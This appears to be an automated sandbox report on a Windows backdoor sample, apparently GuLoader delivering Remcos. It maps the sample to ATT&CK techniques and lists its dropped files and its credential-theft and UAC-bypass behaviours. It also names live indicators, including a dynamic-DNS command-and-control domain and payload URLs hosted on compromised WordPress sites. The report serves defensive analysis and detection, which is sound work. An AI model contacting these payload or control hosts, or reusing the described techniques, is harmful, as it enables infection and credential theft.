                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information211
                      Scripting
                      Valid Accounts11
                      Windows Management Instrumentation
                      211
                      Scripting
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      14
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Bypass User Account Control
                      2
                      Obfuscated Files or Information
                      211
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      2
                      Software Packing
                      2
                      Credentials in Registry
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts223
                      Command and Scripting Interpreter
                      Login Hook1
                      Windows Service
                      1
                      DLL Side-Loading
                      3
                      Credentials In Files
                      3
                      File and Directory Discovery
                      Distributed Component Object Model211
                      Input Capture
                      214
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      Service Execution
                      Network Logon Script222
                      Process Injection
                      1
                      Bypass User Account Control
                      LSA Secrets39
                      System Information Discovery
                      SSH3
                      Clipboard Data
                      Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media2
                      PowerShell
                      RC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials131
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Virtualization/Sandbox Evasion
                      DCSync21
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem4
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483073 Sample: 17220015066e9475efc6df52db0... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 40 iwarsut775laudrye2.duckdns.org 2->40 42 new.quranushaiqer.org.sa 2->42 44 3 other IPs or domains 2->44 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 62 14 other signatures 2->62 10 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 6 16 2->10         started        signatures3 60 Uses dynamic DNS services 40->60 process4 dnsIp5 50 iwarsut775laudrye2.duckdns.org 192.253.251.227, 49710, 49711, 49712 THORDC-ASIS United States 10->50 52 geoplugin.net 178.237.33.50, 49713, 80 ATOM86-ASATOM86NL Netherlands 10->52 36 C:\Users\user\AppData\Roaming\sfvnspt.dat, data 10->36 dropped 38 C:\Users\user\AppData\...\Forfrelsens.vbs, ASCII 10->38 dropped 72 Contains functionality to bypass UAC (CMSTPLUA) 10->72 74 Detected unpacking (changes PE section rights) 10->74 76 Tries to steal Mail credentials (via file registry) 10->76 78 9 other signatures 10->78 15 wscript.exe 1 10->15         started        18 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 1 10->18         started        20 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 1 10->20         started        22 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe 2 10->22         started        file6 signatures7 process8 signatures9 80 Suspicious powershell command line found 15->80 82 Wscript starts Powershell (via cmd or directly) 15->82 84 Obfuscated command line found 15->84 92 3 other signatures 15->92 24 powershell.exe 15 21 15->24         started        86 Tries to steal Instant Messenger accounts or passwords 18->86 88 Tries to steal Mail credentials (via file / registry access) 18->88 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 process10 dnsIp11 46 asociatiatraditiimaria.ro 93.113.54.56, 443, 49716, 49718 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 24->46 48 new.quranushaiqer.org.sa 34.166.62.190, 443, 49723 ATGS-MMD-ASUS United States 24->48 64 Suspicious powershell command line found 24->64 66 Obfuscated command line found 24->66 68 Very long command line found 24->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 24->70 28 powershell.exe 24->28         started        30 conhost.exe 24->30         started        32 cmd.exe 1 24->32         started        signatures12 process13 process14 34 cmd.exe 28->34         started       

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                      17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.imvu.comr0%URL Reputationsafe
                      http://crl.microsoft0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://gmpg.org/xfn/110%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      https://aka.ms/pscore6lB0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://login.yahoo.com/config/login0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                      http://www.imvu.com0%URL Reputationsafe
                      https://api.w.org/0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
                      https://asociatiatraditiimaria.ro/feed/0%Avira URL Cloudsafe
                      https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm100%Avira URL Cloudmalware
                      https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=17207637670%Avira URL Cloudsafe
                      https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gplA0%Avira URL Cloudsafe
                      https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=0%Avira URL Cloudsafe
                      http://www.nirsoft.net0%Avira URL Cloudsafe
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                      https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                      https://www.google.com0%Avira URL Cloudsafe
                      https://asociatiatraditiimaria.ro0%Avira URL Cloudsafe
                      https://asociatiatraditiimaria.ro/os/transportment.pfm100%Avira URL Cloudmalware
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%Avira URL Cloudsafe
                      http://www.nirsoft.net/0%Avira URL Cloudsafe
                      iwarsut775laudrye2.duckdns.org100%Avira URL Cloudmalware
                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                      http://crl.mB0%Avira URL Cloudsafe
                      https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&0%Avira URL Cloudsafe
                      https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0100%Avira URL Cloudmalware
                      https://www.office.com/0%Avira URL Cloudsafe
                      http://www.imvu.compData0%Avira URL Cloudsafe
                      https://asociatiatraditiimaria.ro/comments/feed/0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpp0%Avira URL Cloudsafe
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
                      https://asociatiatraditiimaria.ro/wp-json/0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpRN0%Avira URL Cloudsafe
                      http://crl.microsoft.0%Avira URL Cloudsafe
                      https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                      https://new.quranushaiqer.org.sa100%Avira URL Cloudmalware
                      https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.20%Avira URL Cloudsafe
                      https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml100%Avira URL Cloudphishing
                      https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                      https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        unknown
                        asociatiatraditiimaria.ro
                        93.113.54.56
                        truefalse
                          unknown
                          geoplugin.net
                          178.237.33.50
                          truefalse
                            unknown
                            iwarsut775laudrye2.duckdns.org
                            192.253.251.227
                            truetrue
                              unknown
                              new.quranushaiqer.org.sa
                              34.166.62.190
                              truefalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://asociatiatraditiimaria.ro/os/transportment.pfmfalse
                                • Avira URL Cloud: malware
                                unknown
                                iwarsut775laudrye2.duckdns.orgtrue
                                • Avira URL Cloud: malware
                                unknown
                                http://geoplugin.net/json.gpfalse
                                • URL Reputation: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.imvu.comr17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://asociatiatraditiimaria.ro/feed/powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.microsoftpowershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4552699626.0000000003221000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aefd.nelreports.net/api/report?cat=bingthbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://geoplugin.net/json.gplA17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.nirsoft.net17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197446260.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://aefd.nelreports.net/api/report?cat=bingaotakbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://deff.nelreports.net/api/report?cat=msnbhvF6CA.tmp.4.drfalse
                                • URL Reputation: safe
                                unknown
                                https://gmpg.org/xfn/11powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://geoplugin.net/json.gp/C17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exefalse
                                • URL Reputation: safe
                                unknown
                                https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.4555869381.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://asociatiatraditiimaria.ropowershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contoso.com/powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://login.yahoo.com/config/login17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exefalse
                                • URL Reputation: safe
                                unknown
                                https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.nirsoft.net/17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.mBpowershell.exe, 0000000B.00000002.4564122070.0000000007581000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.4555869381.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.office.com/bhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.imvu.compData17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174423035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174273348.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://geoplugin.net/json.gpp17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://asociatiatraditiimaria.ro/comments/feed/powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.imvu.com17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174423035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174273348.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aefd.nelreports.net/api/report?cat=wsbbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.w.org/powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4555869381.000000000448F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Iconpowershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://asociatiatraditiimaria.ro/wp-json/powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4555869381.000000000448F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.microsoft.powershell.exe, 00000007.00000002.4572916909.0000000007E87000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://geoplugin.net/json.gpRN17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.micropowershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aefd.nelreports.net/api/report?cat=bingaotbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://new.quranushaiqer.org.sapowershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmlpowershell.exe, 0000000B.00000002.4555101569.0000000004DE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://aefd.nelreports.net/api/report?cat=bingrmsbhvF6CA.tmp.4.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/accounts/servicelogin17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ebuddy.com17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                34.166.62.190
                                new.quranushaiqer.org.saUnited States
                                2686ATGS-MMD-ASUSfalse
                                93.113.54.56
                                asociatiatraditiimaria.roRomania
                                5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                                192.253.251.227
                                iwarsut775laudrye2.duckdns.orgUnited States
                                50613THORDC-ASIStrue
                                178.237.33.50
                                geoplugin.netNetherlands
                                8455ATOM86-ASATOM86NLfalse
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1483073
                                Start date and time:2024-07-26 15:46:06 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 38s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                Detection:MAL
                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@18/13@4/4
                                EGA Information:
                                • Successful, ratio: 80%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 136
                                • Number of non-executed functions: 301
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 199.232.210.172
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 2064 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                TimeTypeDescription
                                09:47:04API Interceptor1x Sleep call for process: wscript.exe modified
                                09:47:06API Interceptor1854156x Sleep call for process: powershell.exe modified
                                09:47:28API Interceptor4330548x Sleep call for process: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                34.166.62.190girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                  waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                    93.113.54.56girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                      waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                        dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                          dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                            https://avocat.srl/Auth#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==%25RANDOM5#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==96682=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d%25=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousUnknownBrowse
                                              192.253.251.227girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                  awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                    UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
